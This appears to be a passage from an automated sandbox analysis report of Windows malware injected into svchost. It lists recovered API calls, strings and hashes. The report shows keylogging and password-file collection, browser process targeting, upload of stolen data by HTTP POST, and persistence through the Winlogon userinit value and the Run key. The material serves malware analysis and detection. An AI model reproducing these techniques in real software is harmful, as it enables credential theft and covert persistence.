                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C86446
                                                                                                                                                                                                              • Part of subcall function 02C92E00: OpenProcess.KERNEL32(00000400,00000000,00000000,7556F550,00000000,7744C3F0), ref: 02C92E15
                                                                                                                                                                                                              • Part of subcall function 02C92E00: OpenProcessToken.ADVAPI32(00000000,00000010,?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E2C
                                                                                                                                                                                                              • Part of subcall function 02C92E00: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02C92E4A
                                                                                                                                                                                                              • Part of subcall function 02C92E00: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E62
                                                                                                                                                                                                              • Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C92EBB
                                                                                                                                                                                                              • Part of subcall function 02C92E00: CloseHandle.KERNEL32(?), ref: 02C92ECC
                                                                                                                                                                                                              • Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(00000000,?), ref: 02C92EDE
                                                                                                                                                                                                              • Part of subcall function 02C92E00: CloseHandle.KERNEL32(00000000), ref: 02C92EEF
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 02C8645A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02C86474
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02C86485
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|, xrefs: 02C863E2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$InformationProcess$Close$CriticalHeapOpenProcess32SectionToken$AllocCharCreateCurrentEnterFirstLeaveNextSnapshotToolhelp32Upper
                                                                                                                                                                                                            • String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|
                                                                                                                                                                                                            • API String ID: 3461290786-860058239
                                                                                                                                                                                                            • Opcode ID: 309971bf6f53314554b47302d7e277ad4b9c34fe133696fd324226235836fcf3
                                                                                                                                                                                                            • Instruction ID: 1acad026bad8bc81f15bff71473b071b2aa7c70764d43b849abcc9449434b30f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 309971bf6f53314554b47302d7e277ad4b9c34fe133696fd324226235836fcf3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC319470D41254EFDB21DF65D849B9EB7BCFF88718F1085A9E849D3240D7309A45CB61
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 02C76A4C
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 02C76A5F
                                                                                                                                                                                                              • Part of subcall function 02C92E00: OpenProcess.KERNEL32(00000400,00000000,00000000,7556F550,00000000,7744C3F0), ref: 02C92E15
                                                                                                                                                                                                              • Part of subcall function 02C92E00: OpenProcessToken.ADVAPI32(00000000,00000010,?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E2C
                                                                                                                                                                                                              • Part of subcall function 02C92E00: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02C92E4A
                                                                                                                                                                                                              • Part of subcall function 02C92E00: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E62
                                                                                                                                                                                                              • Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C92EBB
                                                                                                                                                                                                              • Part of subcall function 02C92E00: CloseHandle.KERNEL32(?), ref: 02C92ECC
                                                                                                                                                                                                              • Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(00000000,?), ref: 02C92EDE
                                                                                                                                                                                                              • Part of subcall function 02C92E00: CloseHandle.KERNEL32(00000000), ref: 02C92EEF
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C76A6E
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C76A87
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(00000000), ref: 02C76A8E
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,92f35800a), ref: 02C76AA4
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76AE9
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C76B03
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 02C76B16
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Information$Handle$OpenProcess$CloseCurrentThreadToken$CharDesktopMutexObjectQuerySystemUpperUser_snprintflstrcmpimemset
                                                                                                                                                                                                            • String ID: 92f35800a$Global\HighMemoryEvent_%08x
                                                                                                                                                                                                            • API String ID: 1400009243-2156660352
                                                                                                                                                                                                            • Opcode ID: c8ce148320c71e6f7165467db7b5d437f6a75079891ace40bf26555325746e95
                                                                                                                                                                                                            • Instruction ID: cab2f2639501efa66fa813353dfb62881e3343080eb70cdf95d92355d2c32780
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8ce148320c71e6f7165467db7b5d437f6a75079891ace40bf26555325746e95
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A31F272A40255ABDB21CF61CC88BAAB77CFF94B10F144655FE4497280E7B0AD91CFA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,61FF864A), ref: 029A1451
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,0AFB4677), ref: 029A1515
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2691342691.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_29a0000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocLibraryLoadVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3550616410-0
                                                                                                                                                                                                            • Opcode ID: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                            • Instruction ID: bb8178fee0d07ba4466ffa7705655954c1ec0c1b777c56eb866e195d8b30916b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB914BB5D00719AFCB24DFE8C860BAEB7BAAF88354F154559E809B7344D734AA01CF94

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02CBD888,75572F00,00000000,75570F00), ref: 02C825D9
                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 02C825EB
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C8260B
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8261B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C82690
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C826DC
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C826E9
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000000), ref: 02C8272A
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C8275A
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C82BF2
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 02C82BFF
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C82C12
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C82C1F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C82C43
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C82C46
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C82C52
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C82C55
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C82C63
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C82C66
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C82C72
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C82C75
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD888), ref: 02C82C7C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Path$FileProcess$BackslashCurrentDirectory$CriticalFreeSectionValidate$AttributesCopyDeleteEnterExistsFolderLeave_snprintf
                                                                                                                                                                                                            • String ID: -----------------------------$%s%s$%s%u.zip$--$-----------------------------$3abfb9076ff185e9$92F35D60a$92f35d24a$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$keylog.txt$passwords.txt$software\microsoft
                                                                                                                                                                                                            • API String ID: 390830577-3892896613
                                                                                                                                                                                                            • Opcode ID: e4eac7c1d77b19ea306828177a987b61ff49e9db60d14e95b29b38cd4e43e4e9
                                                                                                                                                                                                            • Instruction ID: 153a4528031931f15edd3c276ebaa6aa38732b7f5ceb29a19e473fb53db9173c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4eac7c1d77b19ea306828177a987b61ff49e9db60d14e95b29b38cd4e43e4e9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58124A719442C65BDB169F309C98BFBBBA5FF85308F0486D4ED869B240DB32DA09C791

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C82690
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C826DC
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C826E9
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000000), ref: 02C8272A
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C8275A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$Backslash$CopyFileFolder
                                                                                                                                                                                                            • String ID: -----------------------------$%s%u.zip$--$-----------------------------$3abfb9076ff185e9$92F35D60a$92f35d24a$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$keylog.txt$passwords.txt$software\microsoft
                                                                                                                                                                                                            • API String ID: 3190534014-1331890041
                                                                                                                                                                                                            • Opcode ID: e2c056e245c04198f486efb39f8410ec92e6f80c18de7ac40bc212f9070211ba
                                                                                                                                                                                                            • Instruction ID: 865299569bd8b8cbb1b101e5ee340d48d98818a7844a4a17295b00d0828f261b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2c056e245c04198f486efb39f8410ec92e6f80c18de7ac40bc212f9070211ba
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 290249319442D65BDB169F3098A8BFBBBE5FF85308F148584ED869B240DB32DA09C791

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000C10,00000000,755735B0,00000000), ref: 02C7410D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C74110
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C74124
                                                                                                                                                                                                            • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C74194
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C741A2
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C741A5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C741B2
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C741B5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 02C741CD
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C741D0
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C741E0
                                                                                                                                                                                                            • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C741FA
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74207
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7420A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7421B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7421E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000083), ref: 02C74249
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C7424C
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C74263
                                                                                                                                                                                                            • htons.WS2_32(?), ref: 02C742D9
                                                                                                                                                                                                            • htons.WS2_32(?), ref: 02C742EC
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C74307
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74313
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C74316
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74323
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C74326
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 02C74332
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C74335
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74342
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C74345
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000C00,00000000,00000001,?,00000000), ref: 02C743A2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C743AB
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C743AE
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C743BB
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C743BE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate$Allocmemset$Tablehtons$FileWrite_snprintf
                                                                                                                                                                                                            • String ID: CLOSED$CLOSE_WAIT$CLOSING$DELETE_TCB$ESTAB$FIN_WAIT1$FIN_WAIT2$LAST_ACK$LISTEN$SYN_RCVD$SYN_SENT$TCP%s:%d%s:%d%s$TIME_WAIT$netstat{ProtoLocal addressRemote addressState
                                                                                                                                                                                                            • API String ID: 3573621883-2402783461
                                                                                                                                                                                                            • Opcode ID: cdf18205eaf4d770cafe0dd934a66c4fea390b45350f0fdebda89808dd7fe703
                                                                                                                                                                                                            • Instruction ID: 6fd2147aa34d27987b0607b3265e8337516b80a64b11be02324dc0ca9855ac84
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cdf18205eaf4d770cafe0dd934a66c4fea390b45350f0fdebda89808dd7fe703
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D91C7B1E40289ABDB259FA5EC88FAF7F78EF85705F144594E508E7281DB30D504CB61

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C8275A
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C827CA
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C827D7
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C827DD
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C827FA
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02C82811
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02C8282E
                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 02C8285D
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,?), ref: 02C82878
                                                                                                                                                                                                            • RemoveDirectoryA.KERNEL32(?), ref: 02C82885
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$AttributesVirtual$AllocBackslashCountDeleteDirectoryFreePathRemoveTick_snprintflstrcpyn
                                                                                                                                                                                                            • String ID: -----------------------------$%s%u.zip$--$-----------------------------$3abfb9076ff185e9$92f35d24a$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$passwords.txt$software\microsoft
                                                                                                                                                                                                            • API String ID: 1417698165-101714038
                                                                                                                                                                                                            • Opcode ID: 96d1b09aead743ab749e9d87d7ed4e3c3599536a2fc97adc4ee112459d75ba1f
                                                                                                                                                                                                            • Instruction ID: 5c746aca08dc5a9761cd58d6ee12c124871ebf8dfcb3648c4e6165b6ec53c4f2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96d1b09aead743ab749e9d87d7ed4e3c3599536a2fc97adc4ee112459d75ba1f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8F14A319442D65BDF169F3098ACBFBBBA5FF85308F048584ED869B240DB32DA09C791

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83655
                                                                                                                                                                                                            • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),02C76406,00000000,00000000,04000000), ref: 02C836E1
                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C836FF
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83731
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83762
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83771
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C8378E
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C837A6
                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000004,00000000), ref: 02C837B3
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,20000013,02C76406,00000004,02C76406), ref: 02C837D3
                                                                                                                                                                                                            • CreateFileA.KERNEL32(02C76406,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83809
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83827
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C8382A
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83842
                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,00001000,00000001), ref: 02C8385F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C83880
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83889
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C8388C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83899
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8389C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838AA
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C838AD
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838BA
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C838BD
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000001), ref: 02C838D3
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C838E4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Content-Type: application/x-www-form-urlencoded, xrefs: 02C8375C
                                                                                                                                                                                                            • HTTP/1.0, xrefs: 02C83729
                                                                                                                                                                                                            • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C8377D
                                                                                                                                                                                                            • Referer: http://www.google.com, xrefs: 02C8376B
                                                                                                                                                                                                            • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C836DC
                                                                                                                                                                                                            • 3abfb9076ff185e9, xrefs: 02C83778
                                                                                                                                                                                                            • POST, xrefs: 02C8371C, 02C8372F
                                                                                                                                                                                                            • GET, xrefs: 02C83712
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Http$ProcessRequest$FileHeadersInternet$FreeHandleOpenValidatememset$AllocCloseConnectCreateInfoInformationQueryReadSendWrite_snprintf
                                                                                                                                                                                                            • String ID: 3abfb9076ff185e9$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
                                                                                                                                                                                                            • API String ID: 1431876097-2068853992
                                                                                                                                                                                                            • Opcode ID: 69b162da5366fc839cd22c819ebd10d18e574b30571f986c4605c700850c8126
                                                                                                                                                                                                            • Instruction ID: 5504d569ebac3d570b88e2c87a30457f6a10eee0940acfc8c6b47d78dcfd1f48
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69b162da5366fc839cd22c819ebd10d18e574b30571f986c4605c700850c8126
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ACA1EB71A402987BEB11AF64DC89FEF776CEF88B19F0046A9F905E7180D7709A14CB61

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe), ref: 02C868DE
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 02C86907
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02C86927
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000010), ref: 02C86944
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C8694B
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8695F
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02C86979
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02C86981
                                                                                                                                                                                                            • RegSetValueExA.KERNEL32(?,userinit,00000000,00000001,00000000,00000002), ref: 02C86A20
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C86A2F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C86A32
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C86A3F
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C86A42
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 02C86A4C
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 02C86A6D
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02C86A9D
